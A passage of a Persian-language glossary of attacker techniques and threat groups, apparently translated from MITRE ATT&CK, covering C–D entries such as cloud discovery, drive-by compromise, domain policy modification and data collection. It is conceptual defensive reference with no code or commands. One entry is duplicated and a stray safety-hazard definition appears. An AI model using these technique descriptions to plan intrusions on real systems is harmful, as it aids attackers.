Persistenceاحراز هویت. دشمنان همچنین ممکن است ازAPIهای کشف زیرساخت مانند DescribeDBInstances برای تعیین اندازه، مالک، مجوزها و ACLهای شبکه منابع پایگاه داده استفاده کنند. دشمنان می توانند از این اطلاعات برای تعیین ارزش بالقوه پایگاه های داده و کشف الزامات دسترسی به آنها استفاده کنند. برخلاف کشف سرویس ابری، این تکنیک بر کشف اجزای خدمات ارائه شده به جای خود سرویس‌ها تمرکز دارد.

کشف سرویس ابری

Cloud Service Discovery

حریف ممکن است پس از دستیابی به دسترسی، سعی کند خدمات ابری را که بر روی یک سیستم اجرا می شوند، شمارش کند. این روش ها می توانند از پلتفرم به عنوان سرویس (PaaS)، به زیرساخت به عنوان سرویس (IaaS) یا نرم افزار به عنوان سرویس (SaaS) متفاوت باشند. خدمات بسیاری در سراسر ارائه دهندگان ابری مختلف وجود دارد و می تواند شامل یکپارچه سازی مداوم و تحویل مداوم (CI/CD، توابع Lambda، Azure AD و غیره باشد. ممکن است دشمنان سعی کنند اطلاعاتی را در مورد خدمات فعال در سراسر محیط کشف کنند. ابزارها و APIهای Azure، مانند Azure AD Graph API و Azure Resource Manager API، می‌توانند منابع و سرویس‌ها، از جمله برنامه‌های کاربردی، گروه‌های مدیریتی، منابع و تعاریف خط‌مشی، و روابط آنها را که با یک هویت قابل دسترسی هستند، شمارش کنند. Stormspotter یک ابزار منبع باز برای شمارش و ساخت یک نمودار برای منابع و خدمات Azure است و Pacu یک چارچوب بهره برداری منبع باز AWS است که از چندین روش برای کشف سرویس های ابری پشتیبانی می کند.

کشف شیء ذخیره سازی ابری

Cloud Storage Object Discovery

دشمنان ممکن است اشیاء را در زیرساخت ذخیره سازی ابری شمارش کنند. دشمنان ممکن است از این اطلاعات در طول کشف خودکار برای شکل دادن به رفتارهای بعدی، از جمله درخواست همه یا اشیاء خاص از فضای ذخیره سازی ابری استفاده کنند. مشابه File and Directory Discovery در یک میزبان محلی، پس از شناسایی سرویس‌های ذخیره‌سازی موجود یعنی (Cloud Infrastructure Discovery) دشمنان ممکن است به محتویات/اشیاء ذخیره‌شده در زیرساخت ابر دسترسی پیدا کنند. ارائه دهندگان خدمات ابری API هایی را ارائه می دهند که به کاربران امکان می دهد اشیاء ذخیره شده در فضای ذخیره سازی ابری را شمارش کنند.

کشف کانتینر و منبع

Container and Resource Discovery

ممکن است دشمنان سعی کنند کانتینرها و سایر منابع موجود در محیط کانتینر را کشف کنند. منابع دیگر ممکن است شامل تصاویر، استقرارها، پادها، گره ها و سایر اطلاعات مانند وضعیت یک خوشه باشد. این منابع را می توان در برنامه‌های کاربردی وب مانند داشبورد Kubernetes مشاهده کرد یا می‌توان از طریق Docker و Kubernetes APIs جستجو کرد. در Docker، گزارش‌ها ممکن است اطلاعات مربوط به محیط، مانند پیکربندی محیط، خدمات در دسترس و ارائه‌دهنده ابری که قربانی ممکن است از آن استفاده کند، درز کند. کشف این منابع ممکن است گام‌های بعدی حریف در محیط، مانند نحوه انجام حرکت جانبی و روش‌هایی که برای اجرا استفاده شود را نشان دهد.

داده های کلیپ بورد

Clipboard Data

دشمنان ممکن است داده های ذخیره شده در کلیپ بورد را از کاربرانی که اطلاعات را در داخل یا بین برنامه ها کپی می کنند جمع آوری کنند. در Windows، برنامه‌ها می‌توانند با استفاده از Windows API به داده‌های کلیپ‌بورد دسترسی داشته باشند. OSX یک دستور بومی، pbpaste، برای گرفتن محتویات کلیپ بورد ارائه می دهد.[2]

ارتباط از طریق رسانه های قابل جابجایی

Communication Through Removable Media

دشمنان می توانند با استفاده از رسانه های قابل جابجایی برای انتقال دستورات از سیستمی به سیستم، فرمان و کنترل را بین میزبان های در معرض خطر در شبکه های بالقوه قطع شده انجام دهند. هر دو سیستم باید به خطر بیفتند، با این احتمال که ابتدا یک سیستم متصل به اینترنت و دومی از طریق حرکت جانبی توسط Replication Through Removable Media به خطر بیفتد. دستورات و فایل ها از سیستم قطع شده به سیستم متصل به اینترنت که حریف مستقیماً به آن دسترسی دارد، منتقل می شود.

یک گروه مجرم سایبری است

Carbanak

Carbanak یک گروه مجرم سایبری است که حداقل از سال 2013 از بدافزار Carbanak برای هدف قرار دادن موسسات مالی استفاده کرده است.

گروه تهدید مشکوک مستقر در چین است

Chimera

Chimera یک گروه تهدید مشکوک مستقر در چین است که حداقل از سال 2018 با هدف قرار دادن صنعت نیمه هادی در تایوان و همچنین داده های صنعت خطوط هوایی فعال بوده است.

یک گروه تهدید است

Cleaver

Cleaver یک گروه تهدید است که به بازیگران ایرانی نسبت داده شده است و مسئولیت فعالیت های ردیابی شده با عنوان Operation Cleaver را بر عهده دارد. شواهد قوی حاکی از آن است که Cleaver به گروه تهدید 2889 (TG-2889) مرتبط است.

یک گروه تهدید با انگیزه مالی است

Cobalt Group

گروه کبالت یک گروه تهدید با انگیزه مالی است که در درجه اول موسسات مالی را حداقل از سال 2016 هدف قرار داده است. این گروه از طریق هدف قرار دادن سیستم های خودپرداز، پردازش کارت، سیستم های پرداخت و سیستم های سوئیفت، برای سرقت پول اقدام به نفوذ کرده است. گروه کبالت عمدتاً بانک های اروپای شرقی، آسیای مرکزی و آسیای جنوب شرقی را هدف قرار داده است. یکی از رهبران ادعایی در اوایل سال 2018 در اسپانیا دستگیر شد، اما به نظر می رسد این گروه همچنان فعال است. این گروه شناخته شده است که سازمان ها را هدف قرار می دهد تا از دسترسی آنها برای به خطر انداختن قربانیان دیگر استفاده کند. گزارش ها نشان می دهد که ممکن است بین Cobalt Group و بدافزار Carbanak و گروه Carbanak پیوندهایی وجود داشته باشد.

یک گروه جاسوسی سایبری ایرانی

CopyKittens

CopyKittens یک گروه جاسوسی سایبری ایرانی است که حداقل از سال 2013 فعالیت می کند. این گروه کشورهایی از جمله اسرائیل، عربستان سعودی، ترکیه، ایالات متحده، اردن و آلمان را هدف قرار داده است. این گروه مسئول کمپین معروف به عملیات لاله های پژمرده است.

یک کمپین جاسوسی سایبری

CostaRicto

CostaRicto یک کمپین جاسوسی سایبری مشکوک برای استخدام هکرها است که از حداقل سال 2019 چندین صنعت را در سراسر جهان هدف قرار داده است. با تمرکز زیاد در جنوب آسیا.

حملات مبتنی بر اعتبار

credential access

حملات مبتنی بر اعتبار زمانی اتفاق می‌افتند که مهاجمان اعتبارنامه‌ها را برای دستیابی به دسترسی، دور زدن اقدامات امنیتی سازمان و سرقت داده‌های حیاتی به سرقت ببرند. سرقت اعتبار، اولین مرحله از یک حمله مبتنی بر اعتبار، فرآیند سرقت اعتبار است.

جمع آوری سایبری

Cyber-collection

جمع آوری سایبری به استفاده از تکنیک های جنگ سایبری به منظور انجام جاسوسی اشاره دارد. فعالیت‌های جمع‌آوری سایبری معمولاً به درج بدافزار در یک شبکه یا رایانه هدفمند به منظور اسکن، جمع‌آوری و استخراج اطلاعات حساس متکی است.

سرور فرمان و کنترل

command-and-control

سرور فرمان و کنترل (C&C) کامپیوتری است که توسط یک مهاجم یا مجرم سایبری کنترل می‌شود و برای ارسال دستورات به سیستم‌هایی که توسط بدافزار در معرض خطر قرار گرفته‌اند و دریافت داده‌های دزدیده شده از یک شبکه هدف استفاده می‌شود.

استحکام سایبری

Cyber robustness

استحکام سایبری توانایی یک سیستم فناوری اطلاعات و ارتباطات برای مقاومت در برابر مهاجمان هوشمند و هدف‌گرا، یعنی تهدیدهای پایدار پیشرفته است. مهاجمان امتیازات خود را افزایش می دهند، به عنوان مثال: حقوق دسترسی از طریق افزایش امتیاز.

پیمایش دایرکتوری

Directory Traversal

پیمایش دایرکتوری (همچنین به عنوان پیمایش مسیر پرونده نیز شناخته می‌شود) یک آسیب‌پذیری امنیت وب است که به مهاجم اجازه می‌دهد فایل‌های دلخواه را در سروری که برنامه‌ای را اجرا می‌کند بخواند. این ممکن است شامل کد برنامه و داده‌ها، اعتبارنامه سیستم‌های پشتیبان و فایل‌های حساس سیستم عامل باشد. در برخی موارد، یک مهاجم ممکن است بتواند روی پرونده‌های دلخواه روی سرور بنویسد و به آنها اجازه دهد داده‌ها یا رفتار برنامه را تغییر دهند و در نهایت کنترل کامل سرور را در دست بگیرند.

توسعه قابلیت‌ها

Develop Capabilities

دشمنان ممکن است قابلیت‌هایی را ایجاد کنند که بتوان از آنها در هنگام هدف‌گیری استفاده کرد. به جای خرید، بارگیری رایگان یا سرقت قابلیت‌ها، دشمنان ممکن است قابلیت‌های داخلی خود را توسعه دهند. این فرایند شناسایی الزامات توسعه و ایجاد راه‌حل‌هایی مانند بدافزارها، سوء استفاده‌ها و گواهینامه‌های خود امضا است. همچنین دشمنان ممکن است قابلیت‌هایی را برای پشتیبانی از عملیات خود در مراحل متعدد چرخه حیات دشمن توسعه دهند. همانطور که در مورد تلاش‌های توسعه مشروع، ممکن است مجموعه‌های مختلف مهارت برای توسعه قابلیت‌ها مورد نیاز باشد. مهارت‌های مورد نیاز ممکن است در داخل خانه قرار داشته باشند، یا ممکن است نیاز به قرارداد داشته باشند. استفاده از پیمانکار ممکن است گسترش قابلیت‌های توسعه آن دشمن تلقی شود، به شرطی که دشمن در شکل‌گیری الزامات ایفای نقش کند و تا حدی انحصار توانایی را حفظ کند.

توسعه قابلیت‌ها: بدافزار

Develop Capabilities: Malware

دشمنان ممکن است بدافزار و مؤلفه‌های بدافزاری را ایجاد کنند که می‌توانند در هنگام هدف‌گیری استفاده شوند. ساختن نرم افزارهای مخرب می‌تواند شامل توسعه ابزارهای پس از سازش، درهای پشتی، پروتکل‌های C2 و ایجاد رسانه‌های قابل جابجایی آلوده باشد. دشمنان ممکن است بدافزاری را برای پشتیبانی از عملیات خود ایجاد کنند، ابزاری برای حفظ کنترل ماشین‌های راه دور، فرار از دفاع، و اجرای رفتارهای پس از سازش ایجاد کنند. همانند تلاش‌های توسعه مشروع، ممکن است مجموعه مهارت‌های مختلفی برای توسعه بدافزار مورد نیاز باشد. مهارت‌های مورد نیاز ممکن است در داخل خانه قرار داشته باشند، یا ممکن است نیاز به قرارداد داشته باشند. استفاده از یک پیمانکار ممکن است گسترش قابلیت‌های توسعه بدافزار آن دشمن در نظر گرفته شود، مشروط بر اینکه دشمن در شکل‌دهی نیازمندی‌ها نقش داشته باشد و درجه انحصاری را برای بدافزار حفظ کند. برخی از جنبه‌های توسعه بدافزار، مانند توسعه پروتکل C2، ممکن است به دشمنان نیاز داشته باشد تا زیرساخت بیشتری را به دست آورند.

توسعه قابلیت ها: گواهی امضای کد

Develop Capabilities: Code Signing Certificates

دشمنان ممکن است گواهی‌های امضای کد خود امضا را ایجاد کنند که می‌تواند در هنگام هدف‌گیری استفاده شود. امضای کد فرآیند امضای دیجیتالی فایل‌های اجرایی و اسکریپت‌ها برای تایید نویسنده نرم افزار و تضمین عدم تغییر یا خرابی کد است. امضای کد سطحی از اعتبار برنامه را از سوی توسعه دهنده و تضمین عدم دستکاری برنامه را فراهم می‌کند. کاربران و/یا ابزارهای امنیتی ممکن است به یک کد امضا شده بیشتر از یک کد بدون امضا اعتماد کنند، حتی اگر ندانند چه کسی گواهی را صادر کرده یا نویسنده آن کیست. قبل از امضای کد، دشمنان ممکن است گواهی‌های امضای کد خودامضا را برای استفاده در عملیات توسعه دهند.

توسعه قابلیت‌ها: گواهی‌های دیجیتال

Develop Capabilities: Digital Certificates

دشمنان ممکن است گواهی‌های SSL/TLS خود امضا شده را ایجاد کنند که می‌تواند در هنگام هدف‌گیری استفاده شود. گواهینامه‌های SSL/TLSبرای القای اعتماد طراحی شده اند. آنها شامل اطلاعاتی درباره کلید، اطلاعاتی در مورد هویت مالک آن و امضای دیجیتالی نهادی است که صحت محتوای گواهی را تأیید کرده است. اگر امضا معتبر باشد و شخصی که گواهی را بررسی می‌کند به امضاکننده اعتماد کند، می‌داند که می‌تواند از آن کلید برای برقراری ارتباط با صاحب آن استفاده کند. در مورد خودامضا، گواهی‌های دیجیتال فاقد عنصر اعتماد مرتبط با امضای یک مرجع گواهی شخص ثالث (CA) خواهند بود. دشمنان ممکن است گواهی‌های SSL/TLS با امضای خود را ایجاد کنند که می‌تواند برای پیشبرد عملیات‌هایشان استفاده شود، مانند رمزگذاری ترافیک C2 (مثلاً رمزنگاری نامتقارن با پروتکل‌های وب) یا حتی فعال کردن Adversary-in-the-Middle اگر به ریشه اعتماد اضافه شود. (یعنی نصب گواهی ریشه). پس از ایجاد یک گواهی دیجیتال، دشمن ممکن است آن گواهی را روی زیرساخت های تحت کنترل خود نصب کند.

توسعه قابلیت‌ها: بهره برداری‌ها

Develop Capabilities: Exploits

دشمنان ممکن است اکسپلویت‌هایی ایجاد کنند که می‌تواند در هنگام هدف گیری مورد استفاده قرار گیرد. یک اکسپلویت از یک باگ یا آسیب‌پذیری به منظور ایجاد رفتار ناخواسته یا پیش بینی نشده در سخت افزار یا نرم افزار رایانه استفاده می‌کند. به جای یافتن/تغییر اکسپلویت‌ها از آنلاین یا خرید آنها از فروشندگان اکسپلویت، دشمن ممکن است اکسپلویت‌های خود را توسعه دهد. دشمنان ممکن است از اطلاعات به دست آمده از طریق آسیب‌پذیری‌ها برای تمرکز بر تلاش‌های توسعه بهره‌برداری استفاده کنند. به عنوان بخشی از فرآیند توسعه اکسپلویت، دشمنان ممکن است آسیب‌پذیری‌های قابل بهره‌برداری را از طریق روش‌هایی مانند تجزیه و تحلیل فازی و پچ کشف کنند. همانند تلاش‌های توسعه مشروع، ممکن است مجموعه مهارت‌های متفاوتی برای توسعه بهره‌برداری مورد نیاز باشد. مهارت‌های مورد نیاز ممکن است در داخل خانه قرار داشته باشند، یا ممکن است نیاز به قرارداد داشته باشند. استفاده از یک پیمانکار ممکن است گسترش قابلیت‌های توسعه بهره‌برداری آن دشمن در نظر گرفته شود، مشروط بر اینکه دشمن در شکل‌دهی نیازمندی‌ها نقش داشته باشد و درجه اولیه انحصار را برای بهره‌برداری حفظ کند. دشمنان ممکن است از اکسپلویت‌ها در طول مراحل مختلف چرخه حیات دشمن استفاده کنند (یعنی بهره برداری از برنامه عمومی، بهره برداری برای اجرای مشتری، بهره برداری برای افزایش امتیاز، بهره برداری برای فرار دفاعی، بهره برداری برای دسترسی به اعتبار، بهره برداری از خدمات از راه دور، و سیستم بهره برداری یا بهره برداری) .

سازش Drive-by

Drive-by Compromise

دشمنان ممکن است از طریق بازدید کاربر از یک وب سایت در طول دوره عادی مرور، به یک سیستم دسترسی پیدا کنند. با این تکنیک، مرورگر وب کاربر معمولاً برای بهره برداری هدف قرار می‌گیرد، اما دشمنان همچنین ممکن است از وب سایت های در معرض خطر برای رفتارهای غیر بهره برداری مانند به دست آوردن توکن دسترسی به برنامه استفاده کنند. راه های مختلفی برای تحویل کد اکسپلویت به مرورگر وجود دارد، از جمله: در جایی که دشمنان نوعی کد مخرب مانند جاوا اسکریپت، iFrames و اسکریپت بین سایتی را تزریق کرده‌اند، یک وب سایت قانونی به خطر می افتد. تبلیغات مخرب از طریق ارائه دهندگان تبلیغات قانونی پرداخت می شود و ارائه می شود. رابط های برنامه وب داخلی برای درج هر نوع شی دیگری که می تواند برای نمایش محتوای وب استفاده شود یا حاوی اسکریپتی باشد که روی مشتری بازدیدکننده اجرا می شود (مانند پست های انجمن، نظرات و سایر محتوای وب قابل کنترل توسط کاربر) استفاده می شود. اغلب وب‌سایتی که توسط یک دشمن استفاده می‌شود، وب‌سایتی است که توسط یک جامعه خاص مانند دولت، یک صنعت خاص یا منطقه بازدید می‌شود، که در آن هدف به خطر انداختن یک کاربر خاص یا مجموعه‌ای از کاربران بر اساس منافع مشترک است. این نوع حمله هدفمند به یک حمله استراتژیک وب اطلاق می شود. چندین نمونه شناخته شده از این اتفاق وجود دارد. فرآیند سازش درایو- بای معمولی: کاربر از وب سایتی بازدید می کند که برای میزبانی محتوای کنترل شده دشمن استفاده می شود. اسکریپت‌ها به طور خودکار اجرا می‌شوند، معمولاً نسخه‌های مرورگر و افزونه‌ها را برای نسخه بالقوه آسیب پذیر جستجو می‌کنند. ممکن است از کاربر خواسته شود که با فعال کردن اسکریپت یا اجزای وب سایت فعال و نادیده گرفتن کادرهای محاوره ای هشدار در این فرآیند کمک کند. پس از یافتن نسخه آسیب پذیر، کد اکسپلویت به مرورگر تحویل داده می شود. در صورت موفقیت آمیز بودن بهره برداری، کد حریف را در سیستم کاربر اجرا می کند مگر اینکه حفاظت‌های دیگری وجود داشته باشد. در برخی موارد، بازدید دوم از وب سایت پس از اسکن اولیه، قبل از تحویل کد اکسپلویت لازم است. بر خلاف Exploit Public-Facing Application، تمرکز این تکنیک، بهره‌برداری از نرم افزار در نقطه پایانی مشتری پس از بازدید از یک وب سایت است. این معمولاً به دشمن اجازه می دهد به سیستم های موجود در شبکه داخلی به جای سیستم‌های خارجی که ممکن است در یک DMZ باشند، دسترسی پیدا کند. همچنین ممکن است دشمنان از وب‌سایت‌های در معرض خطر استفاده کنند تا کاربر را به برنامه‌ای مخربی که برای سرقت توکن‌های دسترسی برنامه‌ها، مانند توکن‌های OAuth طراحی شده است، تحویل دهند تا به برنامه‌ها و اطلاعات محافظت شده دسترسی پیدا کنند. این برنامه های مخرب از طریق پنجره های بازشو در وب سایت های قانونی ارائه شده اند.

استقرار کانتینر

Deploy Container

دشمنان ممکن است یک کانتینر را در محیطی برای تسهیل اجرا یا فرار از دفاع مستقر کنند. در برخی موارد، دشمنان ممکن است یک کانتینر جدید را برای اجرای فرآیندهای مرتبط با یک تصویر یا استقرار خاص، مانند فرآیندهایی که بدافزار را اجرا یا دانلود می‌کنند، مستقر کنند. در برخی دیگر، یک دشمن ممکن است یک کانتینر جدید پیکربندی شده بدون قوانین شبکه، محدودیت های کاربر و غیره را برای دور زدن دفاع های موجود در محیط مستقر کند. کانتینرها را می توان با ابزارهای مختلفی مانند از طریق ایجاد و راه‎اندازی APIهای Docker یا از طریق یک برنامه وب مانند داشبورد Kubernetes یا Kubeflow مستقر کرد. دشمنان ممکن است کانتینرهایی را بر اساس تصاویر مخرب بازیابی یا ساخته شده یا از تصاویر بدخیم که بارهای مخرب را در زمان اجرا دانلود و اجرا می کنند، مستقر کنند.

خطر HAZARD

Danger HAZARD

شرایطی است که دارای پتانسیل صدمه به افراد، آسیب رسانی به تجهیزات، از بین بردن مواد یا کاهش کارآیی در انجام یک عمل از پیش تعیین شده باشد. به همین ترتیب می توان گفت خطر شرایطی است که تماس نامطلوب با یک منبع انرژی را فراهم میکند (خطرات بالقوه).

Deobfuscate/Decode فایل ها یا اطلاعات

Deobfuscate/Decode Files or Information

دشمنان ممکن است از فایل‌های مبهم یا اطلاعات برای مخفی کردن مصنوعات یک نفوذ از تجزیه و تحلیل استفاده کنند. آنها ممکن است به مکانیسم های جداگانه ای برای رمزگشایی یا ابهام زدایی آن اطلاعات نیاز داشته باشند، بسته به اینکه چگونه قصد استفاده از آن را دارند. روش‌هایی برای انجام این کار شامل عملکرد داخلی بدافزار یا استفاده از ابزارهای موجود در سیستم است. یکی از این نمونه ها استفاده از certutil برای رمزگشایی یک فایل اجرایی قابل حمل ابزار دسترسی از راه دور است که در یک فایل گواهی پنهان شده است. مثال دیگر استفاده از دستور Windows copy /b برای مونتاژ مجدد قطعات باینری در یک بار مخرب است. گاهی اوقات ممکن است برای باز کردن آن برای رفع ابهام یا رمزگشایی به عنوان بخشی از اجرای کاربر، اقدام کاربر مورد نیاز باشد. همچنین ممکن است از کاربر خواسته شود که یک رمز عبور برای باز کردن یک فایل فشرده/رمزگذاری شده محافظت شده با رمز عبور که توسط دشمن ارائه شده است وارد کند.

استقرار کانتینر

Deploy Container

دشمنان ممکن است یک کانتینر را در محیطی برای تسهیل اجرا یا فرار از دفاع مستقر کنند. در برخی موارد، دشمنان ممکن است یک کانتینر جدید را برای اجرای فرآیندهای مرتبط با یک تصویر یا استقرار خاص، مانند فرآیندهایی که بدافزار را اجرا یا دانلود می‌کنند، مستقر کنند. در برخی دیگر، یک دشمن ممکن است یک کانتینر جدید پیکربندی شده بدون قوانین شبکه، محدودیت های کاربر و غیره را برای دور زدن دفاع های موجود در محیط مستقر کند. کانتینرها را می‌توان با روش‌های مختلف، از جمله از طریق ایجاد و راه‌اندازی APIهای Docker یا از طریق یک برنامه وب مانند داشبورد Kubernetes یا Kubeflow مستقر کرد. دشمنان ممکن است کانتینرهایی را بر اساس تصاویر مخرب بازیابی یا ساخته شده یا از تصاویر بدخیم که بارهای مخرب را در زمان اجرا دانلود و اجرا می کنند، مستقر کنند.

دسترسی مستقیم به حجم

Direct Volume Access

دشمنان ممکن است مستقیماً به یک حجم برای دور زدن کنترل های دسترسی به فایل و نظارت بر سیستم فایل دسترسی داشته باشند. ویندوز به برنامه ها امکان دسترسی مستقیم به حجم های منطقی را می دهد. برنامه هایی با دسترسی مستقیم ممکن است با تجزیه و تحلیل ساختارهای داده سیستم فایل، فایل ها را مستقیماً از درایو بخوانند و بنویسند. این تکنیک کنترل های دسترسی به فایل ویندوز و همچنین ابزارهای نظارت بر سیستم فایل را دور می زند. ابزارهایی مانند NinjaCopy برای انجام این اقدامات در PowerShell وجود دارد.

اصلاح خط مشی دامنه

Domain Policy Modification

دشمنان ممکن است تنظیمات پیکربندی یک دامنه را برای فرار از دفاع و/یا افزایش امتیازات در محیط های دامنه تغییر دهند. دامنه ها ابزار متمرکزی را برای مدیریت نحوه عملکرد منابع رایانه ای (مثلاً رایانه ها، حساب های کاربری) و تعامل با یکدیگر در یک شبکه فراهم می کنند. خط مشی دامنه همچنین شامل تنظیمات پیکربندی است که ممکن است بین دامنه ها در یک محیط چند دامنه/جنگل اعمال شود. تغییرات در تنظیمات دامنه ممکن است شامل تغییر اشیاء خط مشی گروه دامنه (GPO) یا تغییر تنظیمات اعتماد برای دامنه‌ها، از جمله اعتمادهای فدراسیون باشد. با مجوزهای کافی، دشمنان می توانند تنظیمات خط مشی دامنه را تغییر دهند. از آنجایی که تنظیمات پیکربندی دامنه بسیاری از تعاملات درون محیط اکتیو دایرکتوری (AD) را کنترل می‌کند، تعداد زیادی از حملات بالقوه وجود دارد که می‌تواند از این سوء استفاده ناشی شود. نمونه‌هایی از این سوءاستفاده‌ها عبارتند از اصلاح GPOها برای فشار دادن یک کار برنامه‌ریزی شده مخرب به رایانه‌ها در سراسر محیط دامنه یا تغییر اعتمادهای دامنه برای گنجاندن یک دامنه کنترل‌شده توسط دشمن که در آن می‌توانند نشانه‌های دسترسی را کنترل کنند که متعاقباً توسط آن‌ها پذیرفته می‌شود. منابع دامنه قربانی. دشمنان همچنین می توانند تنظیمات پیکربندی را در محیط AD تغییر دهند تا یک کنترل کننده دامنه سرکش را پیاده سازی کنند. دشمنان ممکن است به طور موقت خط مشی دامنه را تغییر دهند، یک اقدام مخرب انجام دهند و سپس تغییر را برای حذف شاخص های مشکوک برگردانند.

کشف اعتماد دامنه

Domain Trust Discovery

دشمنان ممکن است سعی کنند اطلاعاتی را در مورد روابط اعتماد دامنه جمع‌آوری کنند که ممکن است برای شناسایی فرصت‌های حرکت جانبی در محیط‌های چند دامنه/جنگل ویندوز استفاده شود. Domain Trust مکانیزمی را برای یک دامنه فراهم می کند تا امکان دسترسی به منابع را بر اساس رویه های احراز هویت یک دامنه دیگر فراهم کند. تراست های دامنه به کاربران دامنه مورد اعتماد امکان دسترسی به منابع موجود در دامنه اعتماد را می دهد. اطلاعات کشف شده ممکن است به دشمن کمک کند تا SID-History Injection، Pass the Ticket و Kerberoasting را انجام دهد. اعتماد دامنه را می توان با استفاده از فراخوانی DSEnumerateDomainTrusts() Win32 API ، متدهای .NET و LDAP شمارش کرد. ابزار Windows Nltest شناخته شده است که توسط دشمنان برای شمارش اعتماد دامنه استفاده می شود.

داده ها از Object Storage Cloud

Data from Cloud Storage Object

دشمنان ممکن است به اشیاء داده از فضای ذخیره سازی ابری که به درستی ایمن نشده اند دسترسی پیدا کنند. بسیاری از ارائه دهندگان خدمات ابری راه حل هایی را برای ذخیره سازی داده های آنلاین مانند Amazon S3, Azure Storage, and Google Cloud Storageارائه می دهند. این راه‌حل‌ها با دیگر راه‌حل‌های ذخیره‌سازی (مانند SQL یا Elasticsearch) از این جهت متفاوت هستند که هیچ برنامه جامعی وجود ندارد. داده های این راه حل ها را می توان مستقیماً با استفاده از APIهای ارائه دهنده ابر بازیابی کرد. ارائه دهندگان راه حل معمولاً راهنماهای امنیتی را برای کمک به کاربران نهایی در پیکربندی سیستم ها ارائه می دهند.پیکربندی نادرست توسط کاربران نهایی یک مشکل رایج است. حوادث متعددی وجود داشته است که ذخیره سازی ابری به طور نامناسب ایمن شده است (معمولاً با اجازه دسترسی غیر عمدی عمومی توسط کاربران احراز هویت نشده یا دسترسی بیش از حد گسترده توسط همه کاربران)، اجازه دسترسی آزاد به کارت های اعتباری، اطلاعات شناسایی شخصی، سوابق پزشکی و سایر اطلاعات حساس. همچنین ممکن است دشمنان به عنوان راهی برای دسترسی به اشیاء ذخیره‌سازی ابری که دارای کنترل‌های مجوز دسترسی هستند، اعتبارنامه‌های افشا شده را در مخازن منبع، گزارش‌ها یا ابزارهای دیگر به دست آورند.

داده ها از مخزن پیکربندی

Data from Configuration Repository

دشمنان ممکن است داده های مربوط به دستگاه های مدیریت شده را از مخازن پیکربندی جمع آوری کنند. مخازن پیکربندی توسط سیستم های مدیریتی به منظور پیکربندی، مدیریت و کنترل داده ها در سیستم های راه دور استفاده می شود. مخازن پیکربندی همچنین ممکن است دسترسی از راه دور و مدیریت دستگاه ها را تسهیل کنند. دشمنان ممکن است این مخازن را به منظور جمع آوری مقادیر زیادی از داده های حساس مدیریت سیستم مورد هدف قرار دهند. داده‌های مخازن پیکربندی ممکن است توسط پروتکل‌ها و نرم‌افزارهای مختلف در معرض دید قرار گیرند و می‌توانند طیف گسترده‌ای از داده‌ها را ذخیره کنند، که بسیاری از آنها ممکن است با اهداف Discovery دشمن همسو باشند.

داده ها از مخازن اطلاعات

Data from Information Repositories

دشمنان ممکن است از مخازن اطلاعات برای استخراج اطلاعات ارزشمند استفاده کنند. مخازن اطلاعات ابزارهایی هستند که امکان ذخیره سازی اطلاعات را فراهم می کنند، معمولاً برای تسهیل همکاری یا اشتراک اطلاعات بین کاربران، و می توانند طیف گسترده ای از داده ها را ذخیره کنند که ممکن است به دشمنان در اهداف بعدی یا دسترسی مستقیم به اطلاعات هدف کمک کند. همچنین ممکن است دشمنان از ویژگی های اشتراک خارجی برای به اشتراک گذاشتن اسناد حساس با گیرندگان خارج از سازمان سوء استفاده کنند. در زیر لیست مختصری از نمونه اطلاعاتی است که ممکن است ارزش بالقوه ای برای یک دشمن داشته باشد و همچنین ممکن است در یک مخزن اطلاعات یافت شود: سیاست ها، رویه ها و استانداردها نمودارهای فیزیکی / منطقی شبکه نمودارهای معماری سیستم مستندات سیستم فنی اعتبار تست / توسعه زمانبندی کار / پروژه قطعه کد منبع پیوندهایی به اشتراک‌های شبکه و سایر منابع داخلی اطلاعات ذخیره شده در یک مخزن ممکن است بر اساس نمونه یا محیط خاص متفاوت باشد. مخازن اطلاعات مشترک خاص شامل پلتفرم های مبتنی بر وب مانند Sharepoint و Confluence، سرویس های خاص مانند مخازن کد، پایگاه های داده IaaS، پایگاه های داده سازمانی و سایر زیرساخت های ذخیره سازی مانند SQL Server است.

داده ها از سیستم محلی

Data from Local System

دشمنان ممکن است منابع سیستم محلی مانند سیستم های فایل یا پایگاه های داده محلی را جستجو کنند تا فایل های مورد علاقه و داده های حساس را قبل از Exfiltration پیدا کنند. دشمنان ممکن است این کار را با استفاده از یک مترجم دستور و اسکریپت، مانند cmd انجام دهند، که قابلیت تعامل با سیستم فایل برای جمع آوری اطلاعات را دارد. برخی از دشمنان نیز ممکن است از Automated Collection در سیستم محلی استفاده کنند.

داده از درایو مشترک شبکه

Data from Network Shared Drive

دشمنان ممکن است اشتراک‌های شبکه را در رایانه‌هایی که به خطر انداخته‌اند جستجو کنند تا فایل‌های مورد علاقه خود را پیدا کنند. داده‌های حساس را می‌توان از سیستم‌های راه دور از طریق درایوهای شبکه مشترک (دایرکتوری مشترک میزبان، سرور فایل شبکه، و غیره) که از سیستم فعلی قبل از Exfiltration قابل دسترسی هستند، جمع‌آوری کرد. ممکن است از پوسته‌های فرمان تعاملی استفاده شود، و از عملکرد رایج در cmd ممکن است برای جمع‌آوری اطلاعات استفاده شود.

داده ها از رسانه های قابل جابجایی

Data from Removable Media

دشمنان ممکن است رسانه‌های قابل جابجایی متصل را در رایانه‌هایی که به خطر انداخته‌اند جستجو کنند تا فایل‌های مورد علاقه خود را پیدا کنند. داده های حساس را می توان از هر رسانه قابل جابجایی (درایو دیسک نوری، حافظه USBو غیره) که قبل از Exfiltration به سیستم در معرض خطر متصل شده است، جمع آوری کرد. ممکن است از پوسته‌های فرمان تعاملی استفاده شود، و از عملکرد رایج در cmd ممکن است برای جمع‌آوری اطلاعات استفاده شود. برخی از دشمنان ممکن است از مجموعه خودکار در رسانه های قابل جابجایی نیز استفاده کنند.

داده ها مرحله بندی شده

Data Staged

